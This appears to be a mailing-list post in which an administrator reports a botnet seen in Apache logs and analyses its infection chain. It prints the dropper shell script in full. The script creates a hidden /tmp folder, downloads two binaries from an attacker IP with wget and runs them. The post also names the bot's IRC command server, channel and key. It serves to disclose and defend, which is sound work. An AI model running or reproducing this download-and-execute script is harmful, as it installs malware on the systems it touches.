To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- I found this budding botnet while looking at my Apache logs:
It first instructs the server (via one of many available exploits) to download either of these files (they're both the same): http://204.83.56.144/gicupo http://204.83.56.144/gicuji Here's the contents of said file: #/bin/sh cd /tmp mkdir .font-pix cd .font-pix wget 204.83.56.144/ride chmod +x ride ./ride cd /tmp mkdir .font-pix cd .font-pix wget 204.83.56.144/rider chmod +x rider ./rider As you can see, the file downloads two files: "ride" and "rider". The file "ride" is the actual "bot", which connects to the IRC server "irc.ridernet.org", channel "mambolizo", key "leet". The file "rider" is something else which I've yet to analyze, but it's nearly half a megabyte long and appears to contain the code for sending the exploit request to other servers. I've seen packages like these spreading occasionally, but they usually die out within a week or so because they relied on UnderNet, and although UnderNet has traditionally been a botmaster's paradise, they've been cracking down recently (and they've been VERY responsive with botnet accusations). RiderNet, on the other hand, does not appear to have any functional web site or abuse e-mail address. _______________________________________________ botnets mailing list To report a botnet PRIVATELY please email: [EMAIL PROTECTED] http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
